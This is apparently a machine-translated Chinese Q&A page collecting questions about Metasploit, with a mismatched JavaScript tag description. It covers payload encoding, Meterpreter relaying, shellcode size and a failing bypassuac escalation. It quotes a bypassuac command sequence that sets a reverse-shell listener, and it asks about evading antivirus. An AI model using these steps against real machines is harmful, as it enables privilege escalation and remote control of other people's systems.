问题标签 [metasploit]

For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.

0 投票
1 回答
358 浏览

ruby - 运行meterpreter时ruby脚本出错

我喜欢这个网站,它在其他人的问题中帮助了我很多,现在我加入了,所以如果可以的话,我可以互相帮助。

我这里有个问题。在 VM 中运行meterpreter(来自 metasploit 套件)时,我尝试了一个脚本,该脚本中继受感染机器中的所有端口并在本地机器中创建虚拟接口。但我得到了错误

Undefined method: each.

在查看代码时:

我认为这与我所包围的线有某种关系##。它也必须nil如此,我得到了每个错误。temphostsnil

有人可以为我指出一个好的方向吗?

非常感谢。

PS:如果有人感兴趣,脚本在这里:http ://tools.pentester.es/multirelay

再次感谢!

0 投票
1 回答
853 浏览

encoding - 在 metasploit 中,payload.encoded 默认检索什么编码?

我正在分析这个 metasploit 模块,我想知道在 metasploit 中默认情况下 payload.encoded 检索什么编码方法。

我在那个漏洞利用中做了一个 print payload.encoded (没有设置任何编码器),我得到一个正常的字符串,如:

该模块有一个编码器选项,但它已被评论。

我习惯于查看使用标准十六进制值编码的有效负载,例如:

有人可以帮助我了解 payload.encoded 返回的字符串来自哪里以及它使用什么编码?

0 投票
2 回答
8006 浏览

security - 具有多负载的 Metasploit 通用/自定义负载

我一直在玩新的 MSF4(框架:4.1.0-release.13988,控制台:4.1.0-release.13581)使用 msfvenom 和自定义/通用有效负载的多有效负载支持,但似乎有有关有效负载在编码和兼容性方面支持的信息。

基本上,我正在研究如何关闭服务器端服务,然后让meterpreter 监听它不再绑定的端口。(漏洞利用会进入另一个端口)

本质上,我使用 msfvenom 创建了一个 multipayload,msgbox 和 Meterpreter 背靠背,作为 exe、raw 和 .rb。我试过单独留下编码设置,并将其设置为无。(请注意,自定义/通用有效负载 .rb 源说明只允许无编码)

我还尝试将 EXITFUNC 设置为“无”:

然后我需要将原始多有效负载写入通用/自定义有效负载可以使用的东西:(注意我尝试写入原始、exe、.rb 格式)

最后是时候尝试使用通用/自定义的多有效负载了:(请注意,在尝试设置和利用之前,我每次都重新加载了漏洞利用)

所以我找到了一个解释“没有编码器编码......”错误应该是什么意思。(http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions) 我想这就是 stager 有效载荷的来源。

错误的原因是 windows/msgbox 有效负载,因为它没有上演?或者是多重有效载荷没有上演?如果是后者,那么我看不到多重有效载荷将如何工作,除非它们被分阶段。组合 2 个有效载荷可能比单个有效载荷大。

有人可以至少解释一下应该与通用/有效负载兼容的编码和格式,以便我可以排除吗?我只找到了几个对多负载支持的参考。

提前致谢!我保证一旦我这样做了,我会回答我是如何做到这一点的。

0 投票
1 回答
1241 浏览

security - 从哪里获得 metasploit 解密源代码?

我最近一直在阅读有关获取网站访问者内部 IP 地址的信息,并遇到了 decloak.net,它是 metasploit 框架使用的 IP 解析器。

不幸的是,示例页面已关闭,下载链接已损坏 - 有人知道从哪里获取源代码吗?它不再包含在 metasploit 中了吗?

0 投票
1 回答
3109 浏览

metasploit - metasploit:bypassuac windows 提权挂起

post/windows/escalate/bypassuac 对我来说似乎失败了

出于某种原因,我无法让后期利用模块 bypassuac 工作。这就是我所做的:

  1. 在目标机器上打开了一个 Meterpreter 会话(作为 NETWORKSERVICE 用户)
  2. 将会话置于后台
  3. 尝试像这样使用后期利用模块:

    使用 post/windows/escalate/bypassuac set SESSION 1 set LHOST 192.168.1.100 set LPORT 4444 exploit

  4. 该端口尚未使用,所以应该没问题。

  5. 输出如下:

    [-] 处理程序未能绑定到 192.168.1.100:4444 [ ] 在 0.0.0.0:4444 上启动反向处理程序 [] 正在启动有效负载处理程序... [ ] 将绕过 UAC 可执行文件上传到文件系统... [ ] Meterpreter stager可执行文件 73802 字节长正在上传.. [ ] 已将代理上传到文件系统.... [ ] 后模块执行完成

  6. 然后它返回控制台,什么都不做,没有新的会话,什么都没有。

我检查了以下内容:

  1. 手动将可执行文件 bypassuac-x86.exe 上传到目标。那工作得很好。
  2. 检查病毒扫描程序的警钟是否没有从可执行文件中响起。他们没有

有没有一种手动运行可执行文件的方法,有人可以解释一下如何打开一个具有系统级访问权限的新meterpreter会话吗?

或者我可以以某种方式对有效负载进行编码并使用我的自定义模板来逃避所有防病毒的可能性吗?我还没有找到任何对后期开发模块进行编码的选项。

提前致谢

哈尔瓦尔

0 投票
1 回答
1389 浏览

ruby - 使用用 net/http 编写的现有 Ruby 脚本作为 metasploit 辅助

我想使用以下使用 net/http 编写的 ruby​​ 代码作为 metasploit 辅助。

我想知道哪一个可以帮助我轻松地将它转换为 librex 或任何其他支持文件读/写和使用 gsub 进行字符串操作的 metasploit API:

我的代码如下:

结尾

0 投票
1 回答
4089 浏览

security - Understanding metasploits meterpreter payload

I would like to get more in-depth knowledge of how the meterpreter works. If you disassemble the payload windows/meterpreter/reverse_typ, created by msfpayload with the following commands:

You'll get the following result:

How can I get a better understanding of what this code means? I would like to understand how the meterpreter payload works really, but I don't know where to start, unfortunately.

I started by looking at the code with IDA, but that did not bring me much further.

Any links or resources for reading and further studying are appreciated!

0 投票
1 回答
830 浏览

php - 用于启动应用程序的服务器端脚本

到目前为止,我一直在尝试编写一个 php 脚本,该脚本将在打开页面时运行并启动 metasploit!

我已经尝试过 shell_exec 和 exec 以及所有其他替代方案,但是如果我尝试 msfconsole,我可以让它做一些简单的事情(即 ls、cds 等),但它什么也没做!

我还尝试了一个启动 Firefox 的不同脚本,但又没有任何反应!

现在我知道 php 在服务器上运行,我不希望在客户端机器上看到控制台或 firefox !相反,为了检查它是否有效,我试图回显 shell_exec 的输出!但无论如何,因为我将文件托管在我的机器上(即这是服务器,VM 是客户端),如果它真的可以启动 firefox 我应该能够以与从命令行执行此操作相同的方式看到应用程序在此处打开!

我错过了什么?

有没有其他方法可以做到这一点?(即每次用户打开我的页面时启动 metasploit)

注意:我尝试为 msfconsole 指定完整路径,但这也不起作用!

继承人我到目前为止:

使用“;show”位是为了让它真正运行一些东西并打印一些东西,但没有任何区别!

0 投票
2 回答
2465 浏览

shellcode - 小于 295 字节的 shell 生成 shellcode

我想要小于 295 字节的 shell 生成 shellcode。Metasploit 通常会生成(远)超过 300 字节的 shell 生成 shellcode。

或者无论如何我可以压缩生成shell的shellcode?

编辑:我需要这些用于 Windows XP/2003 的 shellcode。

0 投票
2 回答
1543 浏览

ruby - Metasploit 利用“没有成功的 nop 生成器”

在运行一些 Metasploit 漏洞利用时,在正确设置所有选项并发出“exploit”命令后,会出现“Nop generators succeeded”错误。

当我尝试使用 msfpayload 自己创建有效负载时,不会发生此错误,我很好奇为什么会发生这种情况。

(其中一个漏洞是 squirrelmail_pgp_plugin)

谁能给我解释一下?